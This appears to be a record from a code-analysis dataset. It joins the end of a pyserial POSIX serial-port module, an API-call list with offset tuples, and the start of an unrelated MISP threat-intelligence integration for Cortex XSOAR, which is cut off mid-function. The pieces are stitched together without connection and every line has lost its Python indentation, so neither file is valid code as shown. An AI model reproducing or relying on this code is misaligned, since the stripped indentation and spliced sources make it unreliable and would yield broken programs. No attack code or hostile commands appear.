# Disconnected devices, at least on Linux, show the
# behavior that they are always ready to read immediately
# but reading returns nothing.
raise SerialException('device reports readiness to read but returned no data (device disconnected?)')
read.extend(buf)
return bytes(read)
def write(self, data):
"""Output the given string over the serial port."""
if self.fd is None: raise portNotOpenError
t = len(data)
d = data
if self._writeTimeout is not None and self._writeTimeout > 0:
timeout = time.time() + self._writeTimeout
else:
timeout = None
while t > 0:
try:
n = os.write(self.fd, d)
if timeout:
# when timeout is set, use select to wait for being ready
# with the time left as timeout
timeleft = timeout - time.time()
if timeleft < 0:
raise writeTimeoutError
_, ready, _ = select.select([], [self.fd], [], timeleft)
if not ready:
raise writeTimeoutError
d = d[n:]
t = t - n
except OSError as v:
if v.errno != errno.EAGAIN:
raise SerialException('write failed: %s' % (v,))
return len(data)
def flush(self):
"""Flush of file like objects. In this case, wait until all data
is written."""
self.drainOutput()
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCIFLUSH)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCOFLUSH)
def sendBreak(self, duration=0.25):
"""Send break condition. Timed, returns to idle state after given duration."""
if self.fd is None:
raise portNotOpenError
termios.tcsendbreak(self.fd, int(duration/0.25))
def setBreak(self, level=1):
"""Set break: Controls TXD. When active, no transmitting is possible."""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCSBRK)
else:
fcntl.ioctl(self.fd, TIOCCBRK)
def setRTS(self, level=1):
"""Set terminal status line: Request To Send"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)
def setDTR(self, level=1):
"""Set terminal status line: Data Terminal Ready"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CTS != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_DSR != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_RI != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CD != 0
# - - platform specific - - - -
def drainOutput(self):
"""internal - not portable!"""
if self.fd is None: raise portNotOpenError
termios.tcdrain(self.fd)
def nonblocking(self):
"""internal - not portable!"""
if self.fd is None:
raise portNotOpenError
fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)
def fileno(self):
"""For easier use of the serial port instance with select.
WARNING: this function is not portable to different platforms!"""
if self.fd is None: raise portNotOpenError
return self.fd
def flowControl(self, enable):
"""manually control flow - when hardware or software flow control is
enabled"""
if enable:
termios.tcflow(self.fd, TERMIOS.TCION)
else:
termios.tcflow(self.fd, TERMIOS.TCIOFF)
# assemble Serial class with the platform specifc implementation and the base
# for file-like behavior. for Python 2.6 and newer, that provide the new I/O
# library, derrive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(PosixSerial, FileLike):
pass
else:
# io library present
class Serial(PosixSerial, io.RawIOBase):
pass
class PosixPollSerial(Serial):
"""poll based read implementation. not all systems support poll properly.
however this one has better handling of errors, such as a device
disconnecting while it's in use (e.g. USB-serial unplugged)"""
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
poll = select.poll()
poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)
if size > 0:
while len(read) < size:
# print "\tread(): size",size, "have", len(read) #debug
# wait until device becomes ready to read (or something fails)
for fd, event in poll.poll(self._timeout*1000):
if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):
raise SerialException('device reports error (poll)')
# we don't care if it is select.POLLIN or timeout, that's
# handled below
buf = os.read(self.fd, size - len(read))
read.extend(buf)
if ((self._timeout is not None and self._timeout >= 0) or
(self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:
break # early abort on timeout
return bytes(read)
if __name__ == '__main__':
s = Serial(0,
baudrate=19200, # baud rate
bytesize=EIGHTBITS, # number of data bits
parity=PARITY_EVEN, # enable parity checking
stopbits=STOPBITS_ONE, # number of stop bits
timeout=3, # set a timeout value, None for waiting forever
xonxoff=0, # enable software flow control
rtscts=0, # enable RTS/CTS flow control
)
s.setRTS(1)
s.setDTR(1)
s.flushInput()
s.flushOutput()
s.write('hello')
sys.stdout.write('%r\n' % s.read(5))
sys.stdout.write('%s\n' % s.inWaiting())
del s
| [
"os.open",
"fcntl.fcntl",
"termios.tcflush",
"select.poll",
"termios.tcflow",
"termios.tcdrain",
"termios.tcsetattr",
"FCNTL.ioctl",
"os.uname",
"select.select",
"array.array",
"os.close",
"os.write",
"struct.pack",
"sys.stderr.write",
"struct.unpack",
"time.time",
"sys.platform.lower",
"fcntl.ioctl",
"termios.tcgetattr"
] | [((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['"""I"""', '(0)'], {}), "('I', 0)\n", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_RTS'], {}), "('I', TIOCM_RTS)\n", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['"""I"""', 'TIOCM_DTR'], {}), "('I', TIOCM_DTR)\n", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1178, 1204), 'array.array', 'array.array', (['"""i"""', '([0] * 32)'], {}), "('i', [0] * 32)\n", (1189, 1204), False, 'import array, fcntl\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\n', (1253, 1288), False, 'import FCNTL\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\n', (15346, 15380), False, 'import array, fcntl\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (19773, 19808), False, 'import array, fcntl\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20018, 20053), False, 'import array, fcntl\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20262, 20297), False, 'import array, fcntl\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\n', (20505, 20540), False, 'import array, fcntl\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n', (20933, 20972), False, 'import array, fcntl\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\n', (1516, 1551), False, 'import FCNTL\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\n', (18966, 18985), False, 'import array, fcntl\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\n', (19023, 19042), False, 'import array, fcntl\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\n', (19223, 19257), False, 'import array, fcntl\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\n', (19295, 19329), False, 'import array, fcntl\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\n', (19514, 19548), False, 'import array, fcntl\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\n', (19586, 19620), False, 'import array, fcntl\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['"""I"""', 's'], {}), "('I', s)\n", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((3798, 3826), 'array.array', 'array.array', (['"""i"""', '[baudrate]'], {}), "('i', [baudrate])\n", (3809, 3826), False, 'import array, fcntl\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\n', (3910, 3940), False, 'import array, fcntl\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'], {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')] |
# type: ignore
from typing import Union, List, Dict
from urllib.parse import urlparse
import urllib3
from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute
from pymisp.tools import GenericObjectGenerator
import copy
from pymisp.tools import FileObject
from CommonServerPython import *
logging.getLogger("pymisp").setLevel(logging.CRITICAL)
def handle_connection_errors(error):
if "SSLError" in error:
return_error('Unable to connect to MISP because of a SSLCertVerificationError, '
'Please try to use the Trust any certificate option.')
if "NewConnectionError" in error:
return_error('Unable to connect to MISP because of a NewConnectionError, '
'Please make sure your MISP server url is correct.')
if "Please make sure the API key and the URL are correct" in error:
return_error('Unable to connect to MISP, '
'Please make sure the API key is correct.')
return_error(error)
def warn(*args):
"""
Do nothing with warnings
"""
pass
# Disable requests warnings
urllib3.disable_warnings()
# Disable python warnings
warnings.warn = warn
''' GLOBALS/PARAMS '''
params = demisto.params()
if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):
raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.')
MISP_URL = params.get('url')
VERIFY = not params.get('insecure')
PROXIES = handle_proxy() # type: ignore
try:
PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)
except PyMISPError as e:
handle_connection_errors(e.message)
PREDEFINED_FEEDS = {
'CIRCL': {'name': 'CIRCL OSINT Feed',
'url': 'https://www.circl.lu/doc/misp/feed-osint',
'format': 'misp',
'input': 'network'},
'Botvrij.eu': {'name': 'The Botvrij.eu Data',
'url': 'http://www.botvrij.eu/data/feed-osint',
'format': 'misp',
'input': 'network'}
}
THREAT_LEVELS_TO_ID = {
'High': 1,
'Medium': 2,
'Low': 3,
'Unknown': 4
}
MISP_ENTITIES_TO_CONTEXT_DATA = {
'deleted': 'Deleted',
'category': 'Category',
'comment': 'Comment',
'uuid': 'UUID',
'sharing_group_id': 'SharingGroupID',
'timestamp': 'LastChanged',
'to_ids': 'ToIDs',
'value': 'Value',
'event_id': 'EventID',
'ShadowAttribute': 'ShadowAttribute',
'disable_correlation': 'DisableCorrelation',
'distribution': 'Distribution',
'type': 'Type',
'id': 'ID',
'date': 'CreationDate',
'info': 'Info',
'published': 'Published',
'attribute_count': 'AttributeCount',
'proposal_email_lock': 'ProposalEmailLock',
'locked': 'Locked',
'publish_timestamp': 'PublishTimestamp',
'event_creator_email': 'EventCreatorEmail',
'name': 'Name',
'analysis': 'Analysis',
'threat_level_id': 'ThreatLevelID',
'old_id': 'OldID',
'org_id': 'OrganizationID',
'Org': 'Organization',
'Orgc': 'OwnerOrganization',
'orgc_uuid': 'OwnerOrganization.UUID',
'orgc_id': 'OwnerOrganization.ID',
'orgc_name': 'OwnerOrganization.Name',
'event_uuid': 'EventUUID',
'proposal_to_delete': 'ProposalToDelete',
'description': 'Description',
'version': 'Version',
'Object': 'Object',
'object_id': 'ObjectID',
'object_relation': 'ObjectRelation',
'template_version': 'TemplateVersion',
'template_uuid': 'TemplateUUID',
'meta-category': 'MetaCategory',
'decay_score': 'DecayScore',
'first_seen': 'first_seen',
'last_seen': 'last_seen',
'provider': 'Provider',
'source_format': 'SourceFormat',
'url': 'URL',
'event_uuids': 'EventUUIDS',
}
MISP_ANALYSIS_TO_IDS = {
'initial': 0,
'ongoing': 1,
'completed': 2
}
MISP_DISTRIBUTION_TO_IDS = {
'Your_organization_only': 0,
'This_community_only': 1,
'Connected_communities': 2,
'All_communities': 3,
'Inherit_event': 5
}
SIGHTING_TYPE_NAME_TO_ID = {
'sighting': 0,
'false_positive': 1,
'expiration': 2
}
SIGHTING_TYPE_ID_TO_NAME = {
'0': 'sighting',
'1': 'false_positive',
'2': 'expiration'
}
INDICATOR_TYPE_TO_DBOT_SCORE = {
'FILE': DBotScoreType.FILE,
'URL': DBotScoreType.URL,
'DOMAIN': DBotScoreType.DOMAIN,
'IP': DBotScoreType.IP,
'EMAIL': DBotScoreType.EMAIL,
}
DOMAIN_REGEX = (
r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}"
"[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*"
"\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css"
"|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$"
"|localhost)"
)
MISP_SEARCH_ARGUMENTS = [
'value',
'type',
'category',
'org',
'tags',
'from',
'to',
'event_id',
'uuid',
'to_ids',
'last',
'include_decay_score',
'include_sightings',
'include_correlations',
'limit',
'page',
'enforceWarninglist',
'include_feed_correlations',
]
EVENT_FIELDS = [
'id',
'orgc_id',
'org_id',
'date',
'threat_level_id',
'info',
'published',
'uuid',
'analysis',
'attribute_count',
'timestamp',
'distribution',
'proposal_email_lock',
'locked',
'publish_timestamp',
'sharing_group_id',
'disable_correlation',
'event_creator_email',
'Org',
'Orgc',
'RelatedEvent',
'Galaxy',
'Tag',
'decay_score',
'Object',
'Feed',
]
ATTRIBUTE_FIELDS = [
'id',
'event_id',
'object_id',
'object_relation',
'category',
'type',
'to_ids',
'uuid',
'timestamp',
'distribution',
'sharing_group_id',
'comment',
'deleted',
'disable_correlation',
'first_seen',
'last_seen',
'value',
'Event',
'Object',
'Galaxy',
'Tag',
'decay_score',
'Sighting',
]
def extract_error(error: list) -> List[dict]:
"""
Extracting errors raised by PYMISP into readable response, for more information and examples
please see UT: test_extract_error.
Args:
error: list of responses from error section
Returns:
List[Dict[str, any]]: filtered response
"""
return [{
'code': err[0],
'message': err[1].get('message'),
'errors': err[1].get('errors')
} for err in error]
def dict_to_generic_object_format(args: dict) -> List[dict]:
"""
Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp.
Args:
args: dictionary describes MISP object
Returns:
list: list containing dicts that GenericObjectGenerator can take.
Examples:
>>> {'ip': '8.8.8.8', 'domain': 'google.com'}
[{'ip': '8.8.8.8'}, {'domain': 'google.com'}]
"""
return [{k: v} for k, v in args.items()]
def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:
"""
Args:
template_name: template name as described in https://github.com/MISP/misp-objects
args: arguments to create the generic object
Returns:
GenericObjectGenerator: object created in MISP
Example:
args should look like:
[{'analysis_submitted_at': '2018-06-15T06:40:27'},
{'threat_score': {value=95, to_ids=False}},
{'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},
{'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},
{'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line
"""
misp_object = GenericObjectGenerator(template_name)
misp_object.generate_attributes(args)
return misp_object
def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:
"""
Gets a timestamp from MISP response (1546713469) and converts it to human readable format
"""
return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else ""
def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:
"""
Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT)
Args:
obj_to_build (Union[dict, list, str]): object to replace keys in
Returns:
Union[dict, list, str]: same object type that got in
"""
if isinstance(obj_to_build, list):
return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]
if isinstance(obj_to_build, dict):
return {
(MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):
replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()
}
return obj_to_build
def reputation_command_to_human_readable(outputs, score, events_to_human_readable):
found_tag_id, found_tag_name = "", ""
for event in events_to_human_readable:
# removing those fields as they are shared by the events
found_tag_id = event.pop('Tag_ID')
found_tag_name = event.pop('Tag_Name')
return {
'Attribute Type': outputs[0].get('Type'),
'Dbot Score': score,
'Attribute Value': outputs[0].get('Value'),
'Attribute Category': outputs[0].get('Category'),
'Timestamp': outputs[0].get('Timestamp'),
'Events with the scored tag': events_to_human_readable,
'Scored Tag ID': found_tag_id,
'Scored Tag Name': found_tag_name,
}
def limit_tag_output_to_id_and_name(attribute_dict, is_event_level):
"""
As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields.
In addition, returns set of the found tag ids.
Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag.
Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag.
If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags
(event ones and the event's attribute tags ones as it is part of the event scope).
If the data is attribute's (is_event_level = false), and the tag is only related to an attribute
we would like to add it to tag_set_ids. In any other case, we won't add the tag.
Args:
attribute_dict (dict): The dictionary that includes the tag list.
is_event_level (bool): Whether the attribute_dict was received from an event object,
meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).
"""
output = []
tag_set_ids = set()
tags_list = attribute_dict.get('Tag', [])
for tag in tags_list:
is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'
tag_id = tag.get('id')
if is_event_level:
tag_set_ids.add(tag_id)
else: # attribute level
if not is_event_tag:
tag_set_ids.add(tag_id)
output.append({'ID': tag_id, 'Name': tag.get('name')})
return output, tag_set_ids
def parse_response_reputation_command(misp_response, malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
After getting all the attributes which match the required indicator value, this function parses the response.
This function goes over all the attributes that found (after limit the attributes amount to the given limit)
and by sub-functions calculated the score of the indicator.
For the context data outputs, for every attribute we remove the "Related Attribute" list and limits the tags and
galaxies lists. Eventually, the outputs will be a list of attributes along with their events objects.
Note: When limits the attributes amount, we sort the attributes list by the event ids as the greater event ids are
the newer ones.
Returns:
response (dict): The parsed outputs to context data (array of attributes).
score: the indicator score
found_tag: the tag (id) which made the indicator to get that score
found_related_events (dict): contains info (name, id, threat level id) about all the events that include
the indicator
Please see an example for a response in test_data/reputation_command_response.json
Please see an example for a parsed output in test_data/reputation_command_outputs.json
"""
response = copy.deepcopy(misp_response)
attributes_list = response.get('Attribute')
if not attributes_list:
return None
attributes_list = sorted(attributes_list,
key=lambda attribute_item: attribute_item['event_id'], reverse=True)[:attributes_limit]
found_related_events, attributes_tag_ids, event_tag_ids = prepare_attributes_array_to_context_data(attributes_list)
attribute_in_event_with_bad_threat_level = found_event_with_bad_threat_level_id(found_related_events)
score, found_tag = get_score(attribute_tags_ids=attributes_tag_ids, event_tags_ids=event_tag_ids,
malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level=attribute_in_event_with_bad_threat_level)
formatted_response = replace_keys_from_misp_to_context_data({'Attribute': attributes_list})
return formatted_response, score, found_tag, found_related_events
def prepare_attributes_array_to_context_data(attributes_list):
attributes_tag_ids, event_tag_ids = set(), set()
found_related_events = {}
if not attributes_list:
return None
for attribute in attributes_list:
attribute.pop("RelatedAttribute") # get rid of this useless list
event = attribute.get('Event')
convert_timestamp_to_readable(attribute, event)
found_related_events[event.get("id")] = {"Event Name": event.get("info"),
"Threat Level ID": event.get('threat_level_id'),
"Event ID": event.get("id")}
if event.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(event, True)
event['Tag'] = limit_tag_output
event_tag_ids.update(tag_ids)
if attribute.get('Tag'):
limit_tag_output, tag_ids = limit_tag_output_to_id_and_name(attribute, False)
attribute['Tag'] = limit_tag_output
attributes_tag_ids.update(tag_ids)
return found_related_events, attributes_tag_ids, event_tag_ids
def convert_timestamp_to_readable(attribute, event):
if attribute.get('timestamp'):
attribute['timestamp'] = misp_convert_timestamp_to_date_string(attribute.get('timestamp'))
if event:
if event.get('timestamp'):
attribute['Event']['timestamp'] = misp_convert_timestamp_to_date_string(event.get('timestamp'))
if event.get('publish_timestamp'):
attribute['Event']['publish_timestamp'] = misp_convert_timestamp_to_date_string(
event.get('publish_timestamp'))
def found_event_with_bad_threat_level_id(found_related_events):
bad_threat_level_ids = ["1", "2", "3"]
for event in found_related_events.values():
if event['Threat Level ID'] in bad_threat_level_ids:
return True
return False
def get_score(attribute_tags_ids, event_tags_ids, malicious_tag_ids, suspicious_tag_ids,
is_attribute_in_event_with_bad_threat_level):
"""
Calculates the indicator score by following logic. Indicators of attributes and Events that:
* have tags which configured as malicious will be scored 3 (i.e malicious).
* have tags which configured as suspicious will be scored 2 (i.e suspicious).
* don't have any tags configured as suspicious nor malicious will be scored by their event's threat level id. In
such case, the score will be BAD if the threat level id is in [1,2,3]. Otherwise, the threat level is 4 = Unknown.
note:
- In case the same tag appears in both Malicious tag ids and Suspicious tag ids lists the indicator will
be scored as malicious.
- Attributes tags (both malicious and suspicious) are stronger than events' tags.
"""
found_tag = None
is_attribute_tag_malicious = any((found_tag := tag) in attribute_tags_ids for tag in malicious_tag_ids)
if is_attribute_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_attribute_tag_suspicious = any((found_tag := tag) in attribute_tags_ids for tag in suspicious_tag_ids)
if is_attribute_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
is_event_tag_malicious = any((found_tag := tag) in event_tags_ids for tag in malicious_tag_ids)
if is_event_tag_malicious:
return Common.DBotScore.BAD, found_tag
is_event_tag_suspicious = any((found_tag := tag) in event_tags_ids for tag in suspicious_tag_ids)
if is_event_tag_suspicious:
return Common.DBotScore.SUSPICIOUS, found_tag
# no tag was found
if is_attribute_in_event_with_bad_threat_level:
return Common.DBotScore.BAD, None
return Common.DBotScore.NONE, None
def get_new_misp_event_object(args):
"""
Create a new MISP event object and set the event's details.
"""
event = MISPEvent()
event.distribution = MISP_DISTRIBUTION_TO_IDS[args.get('distribution')]
threat_level_id_arg = args.get('threat_level_id')
if threat_level_id_arg:
event.threat_level_id = THREAT_LEVELS_TO_ID[threat_level_id_arg]
analysis_arg = args.get('analysis')
event.analysis = MISP_ANALYSIS_TO_IDS.get(analysis_arg) if analysis_arg in MISP_ANALYSIS_TO_IDS else analysis_arg
event.info = args.get('info') if args.get('info') else 'Event from XSOAR'
event.date = datetime.today()
